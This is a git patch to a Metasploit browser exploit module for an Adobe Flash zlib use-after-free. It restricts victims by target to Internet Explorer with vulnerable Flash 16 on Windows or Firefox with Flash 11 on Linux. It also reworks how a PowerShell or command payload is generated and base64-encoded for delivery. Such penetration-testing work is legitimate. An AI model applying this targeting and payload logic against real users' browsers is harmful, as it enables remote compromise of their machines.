From b9f9647ab1bb6ece994e92c1120cb5b461576072 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Thu, 21 May 2015 14:06:41 -0500
Subject: [PATCH] Use all the BES power

---
 .../adobe_flash_uncompress_zlib_uaf.rb        | 28 +++++++++++++++----
 1 file changed, 22 insertions(+), 6 deletions(-)

diff --git a/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb b/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb
index 3e996bbcbb..774ab5ab27 100644
--- a/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb
+++ b/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb
@@ -45,16 +45,31 @@ class Metasploit3 < Msf::Exploit::Remote
       'BrowserRequirements' =>
         {
           :source  => /script|headers/i,
+          :arch    => ARCH_X86,
           :os_name => lambda do |os|
               os =~ OperatingSystems::Match::LINUX ||
               os =~ OperatingSystems::Match::WINDOWS_7
             end,
-          :ua_name => lambda { |ua| [Msf::HttpClients::IE, Msf::HttpClients::FF].include?(ua) },
+          :ua_name => lambda do |ua|
+            case target.name
+            when 'Windows'
+              return true if ua == Msf::HttpClients::IE
+            when 'Linux'
+              return true if ua == Msf::HttpClients::FF
+            end
+
+            false
+          end,
           :flash   => lambda do |ver|
-              (ver =~ /^16\./ && Gem::Version.new(ver) <= Gem::Version.new('16.0.0.287')) ||
-                (ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.438'))
-            end,
-          :arch    => ARCH_X86
+            case target.name
+            when 'Windows'
+              return true if ver =~ /^16\./ && Gem::Version.new(ver) <= Gem::Version.new('16.0.0.287')
+            when 'Linux'
+              return true if ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.438')
+            end
+
+            false
+          end
         },
       'Targets'             =>
         [
@@ -97,13 +112,14 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def exploit_template(cli, target_info)
     swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
-    target_payload = get_payload(cli, target_info)
 
     if target.name =~ /Windows/
+      target_payload = get_payload(cli, target_info)
       psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})
       b64_payload = Rex::Text.encode_base64(psh_payload)
       platform_id = 'win'
     elsif target.name =~ /Linux/
+      target_payload = get_payload(cli, target_info.merge(arch: ARCH_CMD))
       b64_payload = Rex::Text.encode_base64(target_payload)
       platform_id = 'linux'
     end